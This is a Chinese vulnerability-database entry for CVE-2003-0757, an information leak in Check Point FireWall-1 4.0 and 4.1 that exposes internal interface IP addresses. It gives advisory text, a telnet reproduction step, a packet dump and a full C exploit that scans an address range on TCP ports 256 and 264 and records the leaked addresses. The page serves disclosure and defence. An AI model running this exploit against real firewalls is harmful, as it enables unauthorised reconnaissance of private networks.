CVE-2003-0757
CVSS5.0
发布时间 :2003-10-20 00:00:00
修订时间 :2008-09-05 16:35:10
NMCOES    

[原文]Check Point FireWall-1 4.0 and 4.1 before SP5 allows remote attackers to obtain the IP addresses of internal interfaces via certain SecuRemote requests to TCP ports 256 or 264, which leaks the IP addresses in a reply packet.


[CNNVD]Check Point Firewall-1 SecuRemote内部接口地址信息泄露漏洞(CNNVD-200310-068)

        
        Check Point FireWall-1 4.0和4.1(SP5之前)包含SecuRemote允许移动用户使用加密和验证会话连接内部网络。
        在SecuRemote和Firewall-1初始化非加密通信阶段,发送的分组包含防火墙的所有IP地址,包括关联的内部接口,攻击者因此可以通过嗅探获得内部IP地址信息。
        在IRM的测试过程中,Check Point Firewall-1设备上的内部IP地址会被泄露。通过telnet连接Firewall-1 4.0和4.1版本的256 TCP端口,输入下列字符:
        aa
        aa
        防火墙的IP地址就会以二进制形式返回。
        另外,当使用SecuRemote连接防火墙的TCP 264端口,如果使用包嗅探器截获数据传输,就可以看到类似如下的IP地址信息:
        15:45:44.029883 192.168.1.1.264 > 10.0.0.1.1038: P 5:21(16) ack 17 win 8744
        (DF)
        0x0000 4500 0038 a250 4000 6e06 5b5a ca4d b102 E..8.P@.n.[Z.M..
        0x0010 5102 42c3 0108 040e 1769 fb25 cdc0 8a36 Q.B......i.%...6
        0x0020 5018 2228 fa32 0000 0000 000c
        
         c0a8 0101 P."(.2.......M..
        0x0030 c0a8 0a01 c0a8 0e01 ........
        c0a8 0101 = 192.168.1.1
        c0a8 0a01 = 192.168.10.1
        c0a8 0e01 = 192.168.14.1
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:checkpoint:firewall-1:4.0Checkpoint Firewall-1 4.0
cpe:/a:checkpoint:firewall-1:4.1Checkpoint Firewall-1 4.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0757
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0757
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-068
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2003-09/0018.html
(VENDOR_ADVISORY)  BUGTRAQ  20030902 IRM 007: The IP addresses of Check Point Firewall-1 internal interfaces may be enumerated using SecuRemote

- 漏洞信息

Check Point Firewall-1 SecuRemote内部接口地址信息泄露漏洞
中危 设计错误
2003-10-20 00:00:00 2005-10-20 00:00:00
远程  
        
        Check Point FireWall-1 4.0和4.1(SP5之前)包含SecuRemote允许移动用户使用加密和验证会话连接内部网络。
        在SecuRemote和Firewall-1初始化非加密通信阶段,发送的分组包含防火墙的所有IP地址,包括关联的内部接口,攻击者因此可以通过嗅探获得内部IP地址信息。
        在IRM的测试过程中,Check Point Firewall-1设备上的内部IP地址会被泄露。通过telnet连接Firewall-1 4.0和4.1版本的256 TCP端口,输入下列字符:
        aa
        aa
        防火墙的IP地址就会以二进制形式返回。
        另外,当使用SecuRemote连接防火墙的TCP 264端口,如果使用包嗅探器截获数据传输,就可以看到类似如下的IP地址信息:
        15:45:44.029883 192.168.1.1.264 > 10.0.0.1.1038: P 5:21(16) ack 17 win 8744
        (DF)
        0x0000 4500 0038 a250 4000 6e06 5b5a ca4d b102 E..8.P@.n.[Z.M..
        0x0010 5102 42c3 0108 040e 1769 fb25 cdc0 8a36 Q.B......i.%...6
        0x0020 5018 2228 fa32 0000 0000 000c
        
         c0a8 0101 P."(.2.......M..
        0x0030 c0a8 0a01 c0a8 0e01 ........
        c0a8 0101 = 192.168.1.1
        c0a8 0a01 = 192.168.10.1
        c0a8 0e01 = 192.168.14.1
        

- 公告与补丁

        厂商补丁:
        Check Point Software
        --------------------
        在CheckPoint version 4.1 Service Pack 5中已经解决这个问题,不过没有得到供应商证实:
        
        http://www.checkpoint.com/techsupport/

- 漏洞信息 (23087)

Check Point Firewall-1 4.x SecuRemote Internal Interface Address Information Leakage Vulnerability (EDBID:23087)
hardware dos
2001-07-17 Verified
0 Jim Becher
N/A [点击下载]
source: http://www.securityfocus.com/bid/8524/info

An information leakage issue has been discovered in Check Point Firewall-1. Because of this, an attacker may gain sensitive information about network resources. 

/************************************************************************/
/* The syntax is:                                                       */
/*       fw1_getints (start IP address) (end IP address)                */
/*                                                                      */
/*  Author: Jim Becher -- jim@becher.net                                */
/************************************************************************/
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>

#define BUFSIZE 64

void snatch(int sock, char *pass) {
 int i, z, sockfd, len, result, bytes;
 int octet=0;
 char temp1[]="\x30\x00\x00\x03";
 char temp2[]="\x02\x59\x05\x21";
 char temp3[]="\x00\x00\x00\x08";
 char command[256];
 char buffer[BUFSIZE]="";
 FILE *out;
 char outfile[21];
 sockfd=sock;

 result=send(sockfd,temp1,4,0);
 sleep(1);    /* Ugly... */

 result=send(sockfd,temp2,4,0);

 result=read(sockfd, buffer, BUFSIZE);

 result=send(sockfd,temp3,4,0);

 result=read(sockfd, buffer, BUFSIZE);

 sprintf(outfile, "ints.%s", pass);
 out = fopen(outfile, "w");
 fprintf(out, "ints:\n", 6);
 i=4;
 while (i<result) {
   for (z=1; z<5; z++) {
     if ( buffer[i] < 0 ) {
       octet=buffer[i]+256;
     }
     else {
       octet=buffer[i];
     }
     fprintf(out, "%d", octet);
     i++;
     if (z != 4) {
       fprintf(out, ".");
     }
   }
   fprintf(out, "\n");
 }
 fprintf(out, buffer, BUFSIZE);
 close(sockfd);
}

void main(int argc, char *argv[])
{
 int sock;
 struct in_addr addr;
 struct sockaddr_in sin;
 unsigned long start;
 unsigned long end;
 unsigned long counter;
 char buffer[1000];
 struct hostent *hp=NULL;
 unsigned long lAddr;
 char *p;
 char trash[16];

 if (argc!=3)
 {
  printf("\nusage : %s start-ip-address  end-ip-address\n\n",argv[0]);
  exit(0);
 }
 
 start=inet_addr(argv[1]);
 end=inet_addr(argv[2]);
 
 for (counter = ntohl(start); counter <= ntohl(end); counter++)
 {
  int jim=0, h=0;

  sock=socket(AF_INET, SOCK_STREAM, 0);
  if ((counter & 0xff) == 255) counter++;
  if ((counter & 0xff) == 0)   counter++;
 
  sin.sin_family=AF_INET;
  sin.sin_port=htons(264);
  sin.sin_addr.s_addr=htonl(counter);
  addr.s_addr=htonl(counter);
  bzero(&(sin.sin_zero), 8);
  fprintf(stdout, "Checking: %s\n", inet_ntoa(addr));
  p=inet_ntoa(addr);
  strcpy(trash, p);
  jim=connect(sock, (struct sockaddr*)&sin, sizeof(sin));
  if (jim==0) {
	fprintf(stdout, "Port 264 open on %s -- Checkpoint Firewall-1 v4.1 or later.\n",inet_ntoa(addr));
	snatch(sock, trash);
    } 
  else {
	fprintf(stdout, "Can not connect to %s on port 264\n\n", inet_ntoa(addr));
	sin.sin_port=htons(256);
	jim=0;
	jim=connect(sock, (struct sockaddr*)&sin, sizeof(sin));
	if (jim==0) {
		fprintf(stdout, "Port 256 open on %s -- Checkpoint Firewall-1 4.0 or earlier.\n",inet_ntoa(addr));
		snatch(sock, trash);
	}
	else {
		fprintf(stdout, "Can not connect to %s on port 256\n\n", inet_ntoa(addr));
	}
    }
  jim=0;
 }
}
		

- 漏洞信息

44697
Check Point FireWall-1 SecuRemote TCP Port 256 Malformed Input Internal IP Address Disclosure
Information Disclosure
Loss of Confidentiality

- 漏洞描述

- 时间线

2003-08-22 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Check Point Firewall-1 SecuRemote Internal Interface Address Information Leakage Vulnerability
Design Error 8524
Yes No
2001-07-17 12:00:00 2009-07-11 11:56:00
Discovery credited to Jim Becher.

- 受影响的程序版本

Check Point Software Firewall-1 4.1 SP4
Check Point Software Firewall-1 4.1 SP3
Check Point Software Firewall-1 4.1 SP2
Check Point Software Firewall-1 4.1 SP1
Check Point Software Firewall-1 4.1
Check Point Software Firewall-1 4.0 SP8
Check Point Software Firewall-1 4.0 SP7
Check Point Software Firewall-1 4.0 SP6
Check Point Software Firewall-1 4.0 SP5
Check Point Software Firewall-1 4.0 SP4
Check Point Software Firewall-1 4.0 SP3
Check Point Software Firewall-1 4.0 SP2
Check Point Software Firewall-1 4.0 SP1
Check Point Software Firewall-1 4.0

- 漏洞讨论

An information leakage issue has been discovered in Check Point Firewall-1. Because of this, an attacker may gain sensitive information about network resources.

- 漏洞利用

Exploit contributed by Jim Becher.

- 解决方案

It has been reported that this issue is resolved in version 4.1 Service Pack 5. This has not been confirmed by the vendor.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站